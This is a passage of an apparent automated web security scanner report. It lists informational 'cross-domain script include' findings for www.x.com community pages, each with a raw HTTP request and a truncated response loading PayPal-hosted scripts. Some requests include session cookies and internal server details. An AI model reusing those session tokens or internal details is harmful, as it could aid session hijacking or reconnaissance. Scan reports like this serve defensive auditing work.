<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.6. https://www.x.com/community/emailPasswordToken!input.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/emailPasswordToken!input.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/emailPasswordToken!input.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=27233 t=1313157085132269
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.7. https://www.x.com/community/feeds  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/feeds HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=92546 t=1313157093104178
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.8. https://www.x.com/community/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/home

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/home HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:30 GMT; Path=/
Vary: User-Agent
JP: D=85622 t=1313157030208430
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.9. https://www.x.com/community/ppx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323232363b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:24 GMT; Path=/
Vary: User-Agent
JP: D=86365 t=1313157084689243
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.10. https://www.x.com/community/ppx/adaptive_accounts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_accounts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/adaptive_accounts HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031383b31342c323036333b31342c323031373b31342c323031363b31342c323030363b31342c323234363b31342c323031353b31342c323031333b31342c323236393b31342c323232313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=100210 t=1313157059307917
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.11. https://www.x.com/community/ppx/adaptive_payments  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_payments

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/adaptive_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031303b31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=110512 t=1313157031704201
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.12. https://www.x.com/community/ppx/apps101  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/apps101

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/apps101 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033373b31342c323033303b31342c323032383b31342c323032373b31342c323032393b31342c323036333b31342c323032363b31342c323032303b31342c323031383b31342c323031373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=126957 t=1313157062588323
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.13. https://www.x.com/community/ppx/authentication  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/authentication

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/authentication HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=114393 t=1313157031269098
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.14. https://www.x.com/community/ppx/businesspayments  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/businesspayments

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/businesspayments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134333b31342c323134353b31342c323034373b31342c323030353b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=142422 t=1313157077938365
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.15. https://www.x.com/community/ppx/button_manager  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/button_manager

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/button_manager HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/dev-tools
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:40:03 GMT; Path=/
Vary: User-Agent
JP: D=263918 t=1313156403269344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.16. https://www.x.com/community/ppx/code_samples  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/code_samples

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/code_samples HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032353b31342c323032333b31342c323033343b31342c323036333b31342c323032343b31342c323036343b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=282830 t=1313157065903868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.17. https://www.x.com/community/ppx/dev-tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/dev-tools HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:39:59 GMT; Path=/
Vary: User-Agent
JP: D=80199 t=1313156399568143
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.18. https://www.x.com/community/ppx/dev-tools/decision_tree  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools/decision_tree

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/dev-tools/decision_tree HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=61135 t=1313157083274538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.19. https://www.x.com/community/ppx/devchallenge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/devchallenge HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:21 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323038363b31342c323134393b31342c323131313b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=53170 t=1313157081752731
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.20. https://www.x.com/community/ppx/devchallenge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/devchallenge/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=56010 t=1313157082994090
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.21. https://www.x.com/community/ppx/developer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/developer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/developer HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=127401 t=1313157083736368
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.22. https://www.x.com/community/ppx/devtalk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devtalk

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/devtalk HTTP/1.1
